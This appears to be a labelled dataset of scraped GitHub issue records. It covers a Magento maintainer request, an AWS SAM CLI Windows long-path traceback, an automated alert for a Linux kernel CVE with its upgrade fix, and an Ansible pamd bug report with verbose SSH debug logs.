looking for maintainer looking for a maintainer to take control of this project and move it forward there are new releases of and apparently some things stopped working i e issue as i no longer work with magento i don t have time to debug the issue anyone interested post your availability here
1
4,712
24,280,305,170
IssuesEvent
2022-09-28 16:48:15
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
closed
Issue with running SpringBoot Application using AWS Lambda in SAMCLI
stage/needs-investigation area/local/invoke area/java maintainer/need-followup
Hello Team, I am not able to test springboot application with AWS lambda in my local using SAM CLI, because it generates classes with very long names , which the SAM Cli is not able to copy to tmp folder, when deploying as a docker container and I get an error as below : Traceback (most recent call last): File "runpy.py", line 194, in _run_module_as_main File "runpy.py", line 87, in _run_code File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\__main__.py", line 12, in <module> cli(prog_name="sam") File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 829, in __call__ return self.main(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 782, in main rv = self.invoke(ctx) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1066, in invoke return ctx.invoke(self.callback, **ctx.params) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\decorators.py", line 73, in new_func return ctx.invoke(f, obj, *args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 157, in wrapped raise exception # pylint: disable=raising-bad-type File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 122, in wrapped return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\utils\version_checker.py", line 41, in wrapped actual_result = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\cli\main.py", line 87, in wrapper return func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\invoke\cli.py", line 83, in cli do_cli( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\invoke\cli.py", line 175, in do_cli context.local_lambda_runner.invoke( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\lib\local_lambda.py", line 137, in invoke self.local_runtime.invoke( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 221, in wrapped_func return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 177, in invoke container = self.create(function_config, debug_context, container_host, container_host_interface) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 71, in create code_dir = self._get_code_dir(function_config.code_abs_path) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 280, in _get_code_dir decompressed_dir: str = _unzip_file(code_path) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 496, in _unzip_file unzip(filepath, temp_dir) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\zip.py", line 99, in unzip extracted_path = _extract(file_info, output_dir, zip_ref) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\zip.py", line 61, in _extract return zip_ref.extract(file_info, output_dir) File "zipfile.py", line 1630, in extract File "zipfile.py", line 1701, in _extract_member FileNotFoundError: [Errno 2] No such file or directory: 'C:\\Users\\<username>\\AppData\\Local\\Temp\\tmphl495n3r\\org\\springframework\\boot\\autoconfigure\\integration\\IntegrationAutoConfiguration$IntegrationRSocketConfiguration$IntegrationRSocketClientConfiguration$RemoteRSocketServerAddressConfigured$TcpAddressConfigured.class' This issue occurs only in Windows Operating System. Is there a solution or a fix already available for this, in one of the solutions, it was advised to change the python file, but I am not good at python. Please help!! Thanks in advance.
True
Issue with running SpringBoot Application using AWS Lambda in SAMCLI - Hello Team, I am not able to test springboot application with AWS lambda in my local using SAM CLI, because it generates classes with very long names , which the SAM Cli is not able to copy to tmp folder, when deploying as a docker container and I get an error as below : Traceback (most recent call last): File "runpy.py", line 194, in _run_module_as_main File "runpy.py", line 87, in _run_code File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\__main__.py", line 12, in <module> cli(prog_name="sam") File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 829, in __call__ return self.main(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 782, in main rv = self.invoke(ctx) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1066, in invoke return ctx.invoke(self.callback, **ctx.params) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\decorators.py", line 73, in new_func return ctx.invoke(f, obj, *args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 157, in wrapped raise exception # pylint: disable=raising-bad-type File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 122, in wrapped return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\utils\version_checker.py", line 41, in wrapped actual_result = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\cli\main.py", line 87, in wrapper return func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\invoke\cli.py", line 83, in cli do_cli( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\invoke\cli.py", line 175, in do_cli context.local_lambda_runner.invoke( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\lib\local_lambda.py", line 137, in invoke self.local_runtime.invoke( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 221, in wrapped_func return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 177, in invoke container = self.create(function_config, debug_context, container_host, container_host_interface) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 71, in create code_dir = self._get_code_dir(function_config.code_abs_path) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 280, in _get_code_dir decompressed_dir: str = _unzip_file(code_path) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 496, in _unzip_file unzip(filepath, temp_dir) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\zip.py", line 99, in unzip extracted_path = _extract(file_info, output_dir, zip_ref) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\zip.py", line 61, in _extract return zip_ref.extract(file_info, output_dir) File "zipfile.py", line 1630, in extract File "zipfile.py", line 1701, in _extract_member FileNotFoundError: [Errno 2] No such file or directory: 'C:\\Users\\<username>\\AppData\\Local\\Temp\\tmphl495n3r\\org\\springframework\\boot\\autoconfigure\\integration\\IntegrationAutoConfiguration$IntegrationRSocketConfiguration$IntegrationRSocketClientConfiguration$RemoteRSocketServerAddressConfigured$TcpAddressConfigured.class' This issue occurs only in Windows Operating System. Is there a solution or a fix already available for this, in one of the solutions, it was advised to change the python file, but I am not good at python. Please help!! Thanks in advance.
main
issue with running springboot application using aws lambda in samcli hello team i am not able to test springboot application with aws lambda in my local using sam cli because it generates classes with very long names which the sam cli is not able to copy to tmp folder when deploying as a docker container and i get an error as below traceback most recent call last file runpy py line in run module as main file runpy py line in run code file c program files amazon awssamcli runtime lib site packages samcli main py line in cli prog name sam file c program files amazon awssamcli runtime lib site packages click core py line in call return self main args kwargs file c program files amazon awssamcli runtime lib site packages click core py line in main rv self invoke ctx file c program files amazon awssamcli runtime lib site packages click core py line in invoke return process result sub ctx command invoke sub ctx file c program files amazon awssamcli runtime lib site packages click core py line in invoke return process result sub ctx command invoke sub ctx file c program files amazon awssamcli runtime lib site packages click core py line in invoke return ctx invoke self callback ctx params file c program files amazon awssamcli runtime lib site packages click core py line in invoke return callback args kwargs file c program files amazon awssamcli runtime lib site packages click decorators py line in new func return ctx invoke f obj args kwargs file c program files amazon awssamcli runtime lib site packages click core py line in invoke return callback args kwargs file c program files amazon awssamcli runtime lib site packages samcli lib telemetry metric py line in wrapped raise exception pylint disable raising bad type file c program files amazon awssamcli runtime lib site packages samcli lib telemetry metric py line in wrapped return value func args kwargs file c program files amazon awssamcli runtime lib site packages samcli lib utils version checker py line in wrapped actual result func args kwargs file c program files amazon awssamcli runtime lib site packages samcli cli main py line in wrapper return func args kwargs file c program files amazon awssamcli runtime lib site packages samcli commands local invoke cli py line in cli do cli file c program files amazon awssamcli runtime lib site packages samcli commands local invoke cli py line in do cli context local lambda runner invoke file c program files amazon awssamcli runtime lib site packages samcli commands local lib local lambda py line in invoke self local runtime invoke file c program files amazon awssamcli runtime lib site packages samcli lib telemetry metric py line in wrapped func return value func args kwargs file c program files amazon awssamcli runtime lib site packages samcli local lambdafn runtime py line in invoke container self create function config debug context container host container host interface file c program files amazon awssamcli runtime lib site packages samcli local lambdafn runtime py line in create code dir self get code dir function config code abs path file c program files amazon awssamcli runtime lib site packages samcli local lambdafn runtime py line in get code dir decompressed dir str unzip file code path file c program files amazon awssamcli runtime lib site packages samcli local lambdafn runtime py line in unzip file unzip filepath temp dir file c program files amazon awssamcli runtime lib site packages samcli local lambdafn zip py line in unzip extracted path extract file info output dir zip ref file c program files amazon awssamcli runtime lib site packages samcli local lambdafn zip py line in extract return zip ref extract file info output dir file zipfile py line in extract file zipfile py line in extract member filenotfounderror no such file or directory c users appdata local temp org springframework boot autoconfigure integration integrationautoconfiguration integrationrsocketconfiguration integrationrsocketclientconfiguration remotersocketserveraddressconfigured tcpaddressconfigured class this issue occurs only in windows operating system is there a solution or a fix already available for this in one of the solutions it was advised to change the python file but i am not good at python please help thanks in advance
1
194,434
22,261,987,063
IssuesEvent
2022-06-10 01:56:51
panasalap/linux-4.19.72_1
https://api.github.com/repos/panasalap/linux-4.19.72_1
reopened
CVE-2020-28974 (Medium) detected in linuxlinux-4.19.224
security vulnerability
## CVE-2020-28974 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linuxlinux-4.19.224</b></p></summary> <p> <p>Apache Software Foundation (ASF)</p> <p>Library home page: <a href=https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux>https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux</a></p> <p>Found in HEAD commit: <a href="https://github.com/panasalap/linux-4.19.72/commit/c5a08fe8179013aad614165d792bc5b436591df6">c5a08fe8179013aad614165d792bc5b436591df6</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A slab-out-of-bounds read in fbcon in the Linux kernel before 5.9.7 could be used by local attackers to read privileged information or potentially crash the kernel, aka CID-3c4e0dff2095. This occurs because KD_FONT_OP_COPY in drivers/tty/vt/vt.c can be used for manipulations such as font height. <p>Publish Date: 2020-11-20 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-28974>CVE-2020-28974</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.0</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Physical - Attack Complexity: Low - Privileges Required: High - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7">https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7</a></p> <p>Release Date: 2020-11-20</p> <p>Fix Resolution: v5.9.7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2020-28974 (Medium) detected in linuxlinux-4.19.224 - ## CVE-2020-28974 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linuxlinux-4.19.224</b></p></summary> <p> <p>Apache Software Foundation (ASF)</p> <p>Library home page: <a href=https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux>https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux</a></p> <p>Found in HEAD commit: <a href="https://github.com/panasalap/linux-4.19.72/commit/c5a08fe8179013aad614165d792bc5b436591df6">c5a08fe8179013aad614165d792bc5b436591df6</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A slab-out-of-bounds read in fbcon in the Linux kernel before 5.9.7 could be used by local attackers to read privileged information or potentially crash the kernel, aka CID-3c4e0dff2095. This occurs because KD_FONT_OP_COPY in drivers/tty/vt/vt.c can be used for manipulations such as font height. <p>Publish Date: 2020-11-20 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-28974>CVE-2020-28974</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.0</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Physical - Attack Complexity: Low - Privileges Required: High - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7">https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7</a></p> <p>Release Date: 2020-11-20</p> <p>Fix Resolution: v5.9.7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
cve medium detected in linuxlinux cve medium severity vulnerability vulnerable library linuxlinux apache software foundation asf library home page a href found in head commit a href found in base branch master vulnerable source files vulnerability details a slab out of bounds read in fbcon in the linux kernel before could be used by local attackers to read privileged information or potentially crash the kernel aka cid this occurs because kd font op copy in drivers tty vt vt c can be used for manipulations such as font height publish date url a href cvss score details base score metrics exploitability metrics attack vector physical attack complexity low privileges required high user interaction none scope unchanged impact metrics confidentiality impact low integrity impact low availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution step up your open source security game with mend
0
3,871
17,114,907,807
IssuesEvent
2021-07-11 06:05:10
restqa/restqa
https://api.github.com/repos/restqa/restqa
closed
Add Anonymous usage statistics
enhancement pair with maintainer
Hello 👋, ### 👀 Background In order to improve the developer experience, we would need to get a few information about the current usage. ### 🤞 What is the expected behavior? During the initialization (`restqa init`) we should ask to the user if he would be agree on sharing some anonymous data. ### 😎 Proposed solution. During the initialization of restqa thought the command `restqa init` we should ask the question: ``` May RestQA report anonymous usage statistics to improve the tool over time? ``` By default the answer should be should be `yes` However the user can disable the options by adding the following value into the `.restqa.yml`: ``` restqa: telemety: false ``` > A proposed library to use could be https://www.npmjs.com/package/analytics Cheers.
True
Add Anonymous usage statistics - Hello 👋, ### 👀 Background In order to improve the developer experience, we would need to get a few information about the current usage. ### 🤞 What is the expected behavior? During the initialization (`restqa init`) we should ask to the user if he would be agree on sharing some anonymous data. ### 😎 Proposed solution. During the initialization of restqa thought the command `restqa init` we should ask the question: ``` May RestQA report anonymous usage statistics to improve the tool over time? ``` By default the answer should be should be `yes` However the user can disable the options by adding the following value into the `.restqa.yml`: ``` restqa: telemety: false ``` > A proposed library to use could be https://www.npmjs.com/package/analytics Cheers.
main
add anonymous usage statistics hello 👋 👀 background in order to improve the developer experience we would need to get a few information about the current usage 🤞 what is the expected behavior during the initialization restqa init we should ask to the user if he would be agree on sharing some anonymous data 😎 proposed solution during the initialization of restqa thought the command restqa init we should ask the question may restqa report anonymous usage statistics to improve the tool over time by default the answer should be should be yes however the user can disable the options by adding the following value into the restqa yml restqa telemety false a proposed library to use could be cheers
1
2,396
8,507,765,939
IssuesEvent
2018-10-30 20:00:17
ansible/ansible
https://api.github.com/repos/ansible/ansible
closed
pamd module doesn't update common-session file
affects_2.7 bug module needs_maintainer needs_triage python3 support:community
##### SUMMARY I am trying to add a pam.d module to common-session using pamd module Task pass ok, nothing is happening. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME pamd ##### ANSIBLE VERSION ``` ansible 2.7.1 config file = None configured module search path = ['/Users/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible executable location = /usr/local/bin/ansible python version = 3.7.0 (default, Sep 18 2018, 18:47:08) [Clang 10.0.0 (clang-1000.10.43.1)] ``` ##### CONFIGURATION ``` HOST_KEY_CHECKING(env: ANSIBLE_HOST_KEY_CHECKING) = False ``` ##### OS / ENVIRONMENT Target OS: Ubuntu 18.04 LTS running on AWS ##### STEPS TO REPRODUCE Run playbook with a role that runs this task <!--- Paste example playbooks or commands between quotes below --> ```yaml --- - name: Added pam_limits module become: yes pamd: type: session name: common-session module_path: pam_limits.so control: required backup: yes ``` ##### EXPECTED RESULTS Expect seeing in `/etc/pam.d/common-session` the entry ``` session required pam_limits.so ``` ##### ACTUAL RESULTS No entry added in `/etc/pam.d/common-session` ``` TASK [oslimits : Added pam_limits module] **************************************************************************************************************************************** task path: /Users/user/github/user/ansible/roles/oslimits/tasks/session.yml:2 <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'echo ~ubuntu && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'/home/ubuntu\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'( umask 77 && mkdir -p "` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" && echo ansible-tmp-1540760027.205646-268627155789715="` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" ) && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'ansible-tmp-1540760027.205646-268627155789715=/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') Using module file /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible/modules/system/pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> PUT /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp TO /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC sftp -b - -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 '[ec2-54-00-00-00.eu-central-1.compute.amazonaws.com]' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'sftp> put /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug2: Remote version: 3\r\ndebug2: Server supports extension "posix-rename@openssh.com" revision 1\r\ndebug2: Server supports extension "statvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "fstatvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "hardlink@openssh.com" revision 1\r\ndebug2: Server supports extension "fsync@openssh.com" revision 1\r\ndebug3: Sent message fd 3 T:16 I:1\r\ndebug3: SSH_FXP_REALPATH . -> /home/ubuntu size 0\r\ndebug3: Looking up /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp\r\ndebug3: Sent message fd 3 T:17 I:2\r\ndebug3: Received stat reply T:101 I:2\r\ndebug1: Couldn\'t stat remote file: No such file or directory\r\ndebug3: Sent message SSH2_FXP_OPEN I:3 P:/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\r\ndebug3: Sent message SSH2_FXP_WRITE I:4 O:0 S:32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 4 32768 bytes at 0\r\ndebug3: Sent message SSH2_FXP_WRITE I:5 O:32768 S:32768\r\ndebug3: Sent message SSH2_FXP_WRITE I:6 O:65536 S:11453\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 5 32768 bytes at 32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 6 11453 bytes at 65536\r\ndebug3: Sent message SSH2_FXP_CLOSE I:4\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'chmod u+x /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 -tt ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'sudo -H -S -n -u root /bin/sh -c '"'"'"'"'"'"'"'"'echo BECOME-SUCCESS-hgdzwkselssyvarkpelisbqztplobhng; /usr/bin/python3 /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py'"'"'"'"'"'"'"'"' && sleep 0'"'"'' Escalation succeeded 